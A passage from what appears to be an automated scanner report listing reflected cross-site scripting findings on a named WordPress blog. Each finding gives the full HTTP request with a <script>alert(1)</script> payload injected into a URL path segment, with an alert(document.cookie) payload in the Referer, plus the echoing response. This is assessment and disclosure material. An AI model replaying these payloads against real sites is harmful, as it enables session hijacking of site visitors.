User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:09 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie,Accept-Encoding
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 13:31:09 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-contente97e5\"><script>alert(1)</script>252c8af24fe/plugins/wp-pagenavi/pagenavi-css.css?ver=2.50"/>
...[SNIP]...

1.31. http://addyosmani.com/blog/wp-content/plugins/wp-pagenavi/pagenavi-css.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-content/plugins/wp-pagenavi/pagenavi-css.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9229d"><script>alert(1)</script>3897cff0b68 was submitted in the REST URL parameter 3. This input was echoed as 9229d\"><script>alert(1)</script>3897cff0b68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/plugins9229d"><script>alert(1)</script>3897cff0b68/wp-pagenavi/pagenavi-css.css?ver=2.50 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:12 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie,Accept-Encoding
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 13:31:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-content/plugins9229d\"><script>alert(1)</script>3897cff0b68/wp-pagenavi/pagenavi-css.css?ver=2.50"/>
...[SNIP]...

1.32. http://addyosmani.com/blog/wp-content/plugins/wp-pagenavi/pagenavi-css.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-content/plugins/wp-pagenavi/pagenavi-css.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83dc5"><script>alert(1)</script>a8c9d308cd2 was submitted in the REST URL parameter 4. This input was echoed as 83dc5\"><script>alert(1)</script>a8c9d308cd2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/plugins/wp-pagenavi83dc5"><script>alert(1)</script>a8c9d308cd2/pagenavi-css.css?ver=2.50 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:15 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie,Accept-Encoding
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 13:31:15 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-content/plugins/wp-pagenavi83dc5\"><script>alert(1)</script>a8c9d308cd2/pagenavi-css.css?ver=2.50"/>
...[SNIP]...

1.33. http://addyosmani.com/blog/wp-content/plugins/wp-pagenavi/pagenavi-css.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-content/plugins/wp-pagenavi/pagenavi-css.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e855"><script>alert(1)</script>e2d582ad4e4 was submitted in the REST URL parameter 5. This input was echoed as 8e855\"><script>alert(1)</script>e2d582ad4e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/plugins/wp-pagenavi/pagenavi-css.css8e855"><script>alert(1)</script>e2d582ad4e4?ver=2.50 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:18 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie,Accept-Encoding
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 13:31:18 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-content/plugins/wp-pagenavi/pagenavi-css.css8e855\"><script>alert(1)</script>e2d582ad4e4?ver=2.50"/>
...[SNIP]...

1.34. http://addyosmani.com/blog/wp-content/plugins/wp-postviews/wp-postviews.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-content/plugins/wp-postviews/wp-postviews.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0d9a"><script>alert(1)</script>dbc41bfa2ac was submitted in the REST URL parameter 2. This input was echoed as e0d9a\"><script>alert(1)</script>dbc41bfa2ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-contente0d9a"><script>alert(1)</script>dbc41bfa2ac/plugins/wp-postviews/wp-postviews.php?_=1297258312289&postviews_id=2456 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:40 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Last-Modified: Wed, 09 Feb 2011 13:31:40 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-contente0d9a\"><script>alert(1)</script>dbc41bfa2ac/plugins/wp-postviews/wp-postviews.php?_=1297258312289&postviews_id=2456"/>
...[SNIP]...

1.35. http://addyosmani.com/blog/wp-content/plugins/wp-postviews/wp-postviews.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-content/plugins/wp-postviews/wp-postviews.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6edf0"><script>alert(1)</script>d9d00838e01 was submitted in the REST URL parameter 3. This input was echoed as 6edf0\"><script>alert(1)</script>d9d00838e01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/plugins6edf0"><script>alert(1)</script>d9d00838e01/wp-postviews/wp-postviews.php?_=1297258312289&postviews_id=2456 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:43 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Last-Modified: Wed, 09 Feb 2011 13:31:44 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-content/plugins6edf0\"><script>alert(1)</script>d9d00838e01/wp-postviews/wp-postviews.php?_=1297258312289&postviews_id=2456"/>
...[SNIP]...

1.36. http://addyosmani.com/blog/wp-content/plugins/wp-postviews/wp-postviews.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-content/plugins/wp-postviews/wp-postviews.php

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e63c"><script>alert(1)</script>41a4f61ec80 was submitted in the REST URL parameter 4. This input was echoed as 3e63c\"><script>alert(1)</script>41a4f61ec80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/plugins/wp-postviews3e63c"><script>alert(1)</script>41a4f61ec80/wp-postviews.php?_=1297258312289&postviews_id=2456 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Last-Modified: Wed, 09 Feb 2011 13:31:47 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-content/plugins/wp-postviews3e63c\"><script>alert(1)</script>41a4f61ec80/wp-postviews.php?_=1297258312289&postviews_id=2456"/>
...[SNIP]...

1.37. http://addyosmani.com/blog/wp-content/plugins/wp-postviews/wp-postviews.php [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-content/plugins/wp-postviews/wp-postviews.php

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c795"><script>alert(1)</script>100e771e126 was submitted in the REST URL parameter 5. This input was echoed as 8c795\"><script>alert(1)</script>100e771e126 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/plugins/wp-postviews/wp-postviews.php8c795"><script>alert(1)</script>100e771e126?_=1297258312289&postviews_id=2456 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:50 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Last-Modified: Wed, 09 Feb 2011 13:31:51 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-content/plugins/wp-postviews/wp-postviews.php8c795\"><script>alert(1)</script>100e771e126?_=1297258312289&postviews_id=2456"/>
...[SNIP]...

1.38. http://addyosmani.com/blog/wp-includes/js/jquery/jquery.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d6b1"><script>alert(1)</script>9be0c96d337 was submitted in the REST URL parameter 2. This input was echoed as 1d6b1\"><script>alert(1)</script>9be0c96d337 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-includes1d6b1"><script>alert(1)</script>9be0c96d337/js/jquery/jquery.js?ver=1.4.2 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:10 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie,Accept-Encoding
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 13:31:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-includes1d6b1\"><script>alert(1)</script>9be0c96d337/js/jquery/jquery.js?ver=1.4.2"/>
...[SNIP]...

1.39. http://addyosmani.com/blog/wp-includes/js/jquery/jquery.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0d40"><script>alert(1)</script>8b758a4062c was submitted in the REST URL parameter 3. This input was echoed as b0d40\"><script>alert(1)</script>8b758a4062c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-includes/jsb0d40"><script>alert(1)</script>8b758a4062c/jquery/jquery.js?ver=1.4.2 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:13 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie,Accept-Encoding
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 13:31:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-includes/jsb0d40\"><script>alert(1)</script>8b758a4062c/jquery/jquery.js?ver=1.4.2"/>
...[SNIP]...

1.40. http://addyosmani.com/blog/wp-includes/js/jquery/jquery.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a88f4"><script>alert(1)</script>a4e75e6aa52 was submitted in the REST URL parameter 4. This input was echoed as a88f4\"><script>alert(1)</script>a4e75e6aa52 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-includes/js/jquerya88f4"><script>alert(1)</script>a4e75e6aa52/jquery.js?ver=1.4.2 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:16 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie,Accept-Encoding
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 13:31:17 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-includes/js/jquerya88f4\"><script>alert(1)</script>a4e75e6aa52/jquery.js?ver=1.4.2"/>
...[SNIP]...

1.41. http://addyosmani.com/blog/wp-includes/js/jquery/jquery.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bcff"><script>alert(1)</script>efa9d4c1a8b was submitted in the REST URL parameter 5. This input was echoed as 4bcff\"><script>alert(1)</script>efa9d4c1a8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-includes/js/jquery/jquery.js4bcff"><script>alert(1)</script>efa9d4c1a8b?ver=1.4.2 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:31:19 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie,Accept-Encoding
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 13:31:20 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 21128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/wp-includes/js/jquery/jquery.js4bcff\"><script>alert(1)</script>efa9d4c1a8b?ver=1.4.2"/>
...[SNIP]...

1.42. http://addyosmani.com/blog/wp-includes/js/thickbox/thickbox.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-includes/js/thickbox/thickbox.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 629ec"><script>alert(1)</script>cb0b354f1f3 was submitted in the REST URL parameter 2. This input was echoed as 629ec\"><script>alert(1)</script>cb0b354f1f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-includes629ec"><script>alert(1)</script>cb0b354f1f3/js/thickbox/thickbox.css?ver=20090514 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
